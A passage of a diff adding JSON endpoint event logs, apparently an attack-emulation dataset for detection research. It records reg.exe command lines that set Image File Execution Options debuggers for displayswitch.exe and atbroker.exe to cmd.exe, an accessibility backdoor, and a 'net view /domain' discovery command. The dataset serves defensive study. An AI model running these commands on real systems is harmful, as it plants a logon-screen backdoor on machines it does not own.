add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4916, + "ppid": 4764, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571828950000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}", + "unique_ppid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 4916, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4916, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4916, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4916, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4916, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 4916, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 4916, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4916, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4916, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" + }, + { + "event_type": "registry", + "pid": 4916, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\displayswitch.exe", + "registry_value": "displayswitch.exe", + "timestamp": 131883571829020000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" + }, + { + "event_type": "registry", + "pid": 4916, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\displayswitch.exe", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\displayswitch.exe\\Debugger", + "registry_value": "Debugger", + "timestamp": 131883571829020000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" + }, + { + "event_type": "process", + "pid": 4916, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571829020000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" + }, + { + "event_type": "process", + "pid": 4764, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571829020000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 2960, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571829120000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2960, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829020000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2960, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829020000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2960, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829020000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2960, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829020000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2960, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829020000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}" + }, + { + "event_type": "process", + "pid": 2960, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571829180000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\atbroker.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 556, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571829730000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 556, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 556, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 556, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 556, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 556, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}" + }, + { + "command_line": "reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\atbroker.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7292, + "ppid": 556, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571829830000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}", + "unique_ppid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 7292, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571829800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7292, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571829800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7292, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571829800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7292, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571829800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7292, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571829800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 7292, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571829800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 7292, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571829800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7292, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571829800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7292, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571829800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" + }, + { + "event_type": "registry", + "pid": 7292, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe", + "registry_value": "atbroker.exe", + "timestamp": 131883571829800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" + }, + { + "event_type": "registry", + "pid": 7292, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger", + "registry_value": "Debugger", + "timestamp": 131883571829800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" + }, + { + "event_type": "process", + "pid": 7292, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571829800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" + }, + { + "event_type": "process", + "pid": 556, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571829950016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 5244, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571830030000, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010E04D5101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5244, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829950016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010E04D5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5244, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829950016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010E04D5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5244, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829950016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010E04D5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5244, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829950016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010E04D5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5244, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829950016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010E04D5101}" + }, + { + "event_type": "process", + "pid": 5244, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571829950016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010E04D5101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"net view /domain\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 5360, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571831130016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5360, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571831050000, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5360, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571831050000, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5360, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571831050000, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5360, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571831050000, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5360, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571831050000, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}" + }, + { + "command_line": "net view /domain", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5628, + "ppid": 5360, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "subtype": "create", + "timestamp": 131883571831220000, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}", + "unique_ppid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "net.exe", + "image_path": "C:\\Windows\\System32\\net.exe", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "mpr.dll", + "image_path": "C:\\Windows\\System32\\mpr.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "wkscli.dll", + "image_path": "C:\\Windows\\System32\\wkscli.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "netutils.dll", + "image_path": "C:\\Windows\\System32\\netutils.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "samcli.dll", + "image_path": "C:\\Windows\\System32\\samcli.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "srvcli.dll", + "image_path": "C:\\Windows\\System32\\srvcli.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "browcli.dll", + "image_path": "C:\\Windows\\System32\\browcli.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "cscapi.dll", + "image_path": "C:\\Windows\\System32\\cscapi.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "destination_address": "192.168.162.129", + "destination_port": "5353", + "event_type": "network", + "pid": 1612, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "protocol": "udp", + "source_address": "224.0.0.251", + "source_port": "5353", + "subtype": "incoming", + "timestamp": 131883571831380000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}", + "user": "NT AUTHORITY\\NETWORK SERVICE", + "user_domain": "NT AUTHORITY", + "user_name": "NETWORK SERVICE" + }, + { + "destination_address": "fe80:0:0:0:880a:c7ff:8cc2:f18b", + "destination_port": "5353", + "event_type": "network", + "pid": 1612, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "protocol": "udp", + "source_address": "ff02:0:0:0:0:0:0:fb", + "source_port": "5353", + "subtype": "incoming", + "timestamp": 131883571831390000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}", + "user": "NT AUTHORITY\\NETWORK SERVICE", + "user_domain": "NT AUTHORITY", + "user_name": "NETWORK SERVICE" + }, + { + "destination_address": "192.168.162.129", + "destination_port": "137", + "event_type": "network", + "pid": 4, + "process_name": "System", + "process_path": "System", + "protocol": "udp", + "source_address": "192.168.162.134", + "source_port": "137", + "subtype": "outgoing", + "timestamp": 131883571841500000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "destination_address": "fe80:0:0:0:880a:c7ff:8cc2:f18b", + "destination_port": "5355", + "event_type": "network", + "pid": 1612, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "protocol": "udp", + "source_address": "fe80:0:0:0:c155:c569:9151:7881", + "source_port": "56888", + "subtype": "incoming", + "timestamp": 131883571841509984, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}", + "user": "NT AUTHORITY\\NETWORK SERVICE", + "user_domain": "NT AUTHORITY", + "user_name": "NETWORK SERVICE" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\DhcpInterfaceOptions", + "registry_value": "DhcpInterfaceOptions", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": 